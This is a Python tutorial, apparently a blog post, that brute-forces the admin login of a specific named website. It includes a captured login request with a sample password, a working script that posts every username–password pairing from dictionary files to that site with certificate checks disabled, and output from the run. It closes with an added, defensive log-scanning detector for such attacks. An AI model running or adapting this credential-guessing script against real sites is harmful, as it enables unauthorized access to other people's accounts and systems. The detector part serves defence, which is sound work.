Python 3: file reading and writing, POST form requests, HTML processing, list splitting and traversal, brute-forcing usernames and passwords

1. Target site for the test, whose username and password are brute-forced
POST https://696365wz.com/admin.php/?action=login HTTP/1.1
Host: 696365wz.com
Connection: keep-alive
Content-Length: 63
Cache-Control: max-age=0
Origin: https://696365wz.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://696365wz.com/admin.php/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9

adminname=admin&adminpassword=qaz123456&form=%E6%8F%90%E4%BA%A4


HTTP/1.1 200 OK
Date: Tue, 07 Jan 2020 01:04:54 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 786
Content-Type: text/html; charset=utf-8

    

2. Dictionaries used for the brute-force: the username file and the password file


3. The Python code is as follows.
# -*- coding: utf-8 -*-
"""
Created on Tue Jan  7 09:23:33 2020

@author: fern.xu
"""
import requests
import time
import bs4
from bs4 import BeautifulSoup   

usernamelist =[]
passwordlist = []

def username_password():  # load the txt dictionary files into the two lists
    '''
    f1 = open('D:/soft/txt/username.txt','r')  # combined file, one pair per line
    #username.txt line format: admin 123456
    usernamepasswords = f1.readlines()
    f1.close()
    for usernamepassword in usernamepasswords:  # split each line into its two fields
        username = usernamepassword.strip("\n")
        username1 = username.split(" ")[0]  # first field: username
        password1 = username.split(" ")[1]  # second field: password
        usernamelist.append(username1)
        passwordlist.append(password1)
    '''
    '''
    # write usernamelist to its own file
    filename = 'D:/soft/txt/user.txt'
    with open(filename,'w') as f3:
        for user in usernamelist:
            f3.write(user)
            f3.write('\n')
    # write passwordlist to its own file
    filename = 'D:/soft/txt/pass.txt'
    with open(filename,'w') as f3:
        for user in passwordlist:
            f3.write(user)
            f3.write('\n')
    '''
    f0 = open('D:/soft/txt/user.txt','r')  # username file, one entry per line
    all_usernames = f0.readlines()
    f0.close()
    for all_username in all_usernames:
        username = all_username.strip('\n')
        usernamelist.append(username)

    f2 = open('D:/soft/txt/password.txt','r')  # password file, one entry per line
    # https://blog.csdn.net/qq_34457594/article/details/78753761
    all_passwords = f2.readlines()
    f2.close()
    for all_password in all_passwords:
        password2 = all_password.strip("\n")
        #print(password2)
        passwordlist.append(password2)
    #print(usernamelist)
    #print(passwordlist)

username_password()
#print(usernamelist)
#print(passwordlist)

def posturl(username,password):
    # verify=False below turns off certificate verification, so silence the warning
    #urllib3.disable_warnings()
    requests.packages.urllib3.disable_warnings()
    url = 'https://696365wz.com/admin.php/?action=login'
    headers = {  # request headers copied from the captured request
        'Host':'696365wz.com',
        'Connection':'keep-alive',
        'Content-Length':'63',
        'Cache-Control':'max-age=0',
        'Origin':'https://696365wz.com',
        'Upgrade-Insecure-Requests':'1',
        'Content-Type':'application/x-www-form-urlencoded',
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'Referer':'https://696365wz.com/admin.php/',
        'Accept-Encoding':'gzip, deflate, br',
        'Accept-Language':'zh-CN,zh;q=0.9'
    }
    data = {'adminname':username,'adminpassword':password,'form':'%E6%8F%90%E4%BA%A4'}
    html = requests.post(url=url,headers=headers,data=data,verify=False).text
    #print(html)
    soup=BeautifulSoup(html,'lxml')
    #print(lep_soup)
    href = soup.find_all("h4")  # the page reports the login result in an <h4> element
    print(href)

#posturl("test","test123")
n =0
for username in usernamelist:  # every username is paired with every password
    for password in passwordlist:
        n= n + 1
        # print the attempt number, the username and the password
        print(" %d , :%s, :%s" %(n,username,password))
        posturl(username,password)
        time.sleep(2)  # wait 2 seconds between requests

4. Run results:
..........................
.........................
 221 , :Administrator, :794613
[, !]
 222 , :Administrator, :784512
[, !]
 223 , :Administrator, :895623
[, !]
 224 , :Administrator, :789456
[, !]
 225 , :Administrator, :456123
[, !]
 226 , :Administrator, :654321
[, !]
 227 , :Administrator, :123!@#
[, !]
 228 , :Administrator, :1234!@#$
[, !]
 229 , :Administrator, :11185
[, !]
 230 , :Administrator, :12345!@#$%
[, !]
 231 , :Administrator, :qwe123!@#
[, !]
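
Seen from the server side, the loop above appears in the access log as a steady run of POSTs to the login endpoint from a single client, one every 2 seconds. The detector below is an added example, not part of the original post: it counts login POSTs per client in a sliding window. The Apache log format, the 60-second window, the threshold of 10 and the sample addresses are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/admin.php/?action=login"  # endpoint from the captured request
WINDOW = timedelta(seconds=60)           # assumed detection window
THRESHOLD = 10                           # assumed max login POSTs per window
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"          # Apache access-log timestamp

# Apache common/combined log prefix: client, timestamp, method, path.
# The status code is ignored: the captured response is 200 OK, so a failed
# login is assumed to be indistinguishable from a successful one by status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) ')


def detect_bruteforce(lines, window=WINDOW, threshold=THRESHOLD):
    """Map each client IP to the time it first exceeded `threshold`
    POSTs to the login endpoint within a sliding `window`."""
    recent = defaultdict(deque)  # ip -> login POST times still in the window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, raw_ts, method, path = m.groups()
        if method != "POST" or path != LOGIN_PATH:
            continue
        ts = datetime.strptime(raw_ts, TS_FMT)
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts older than the window
            q.popleft()
        if len(q) > threshold:
            alerts.setdefault(ip, ts)
    return alerts


def sample_log():
    """Constructed log: one client posting every 2 s, one ordinary user."""
    base = datetime(2020, 1, 7, 1, 0, 0, tzinfo=timezone.utc)
    row = '{} - - [{}] "{} {} HTTP/1.1" 200 786'
    lines = [row.format("203.0.113.7",
                        (base + timedelta(seconds=2 * i)).strftime(TS_FMT),
                        "POST", LOGIN_PATH) for i in range(30)]
    lines.append(row.format("198.51.100.20", base.strftime(TS_FMT), "POST", LOGIN_PATH))
    lines.append(row.format("198.51.100.20", base.strftime(TS_FMT), "GET", "/admin.php/"))
    return lines


if __name__ == "__main__":
    for ip, when in detect_bruteforce(sample_log()).items():
        print(f"{ip} exceeded {THRESHOLD} login POSTs per {WINDOW} at {when}")
```

With a 2-second interval between requests, the eleventh POST arrives 20 seconds after the first, which is where the constructed client crosses the threshold; the same count can drive a temporary lockout or a CAPTCHA on the login form.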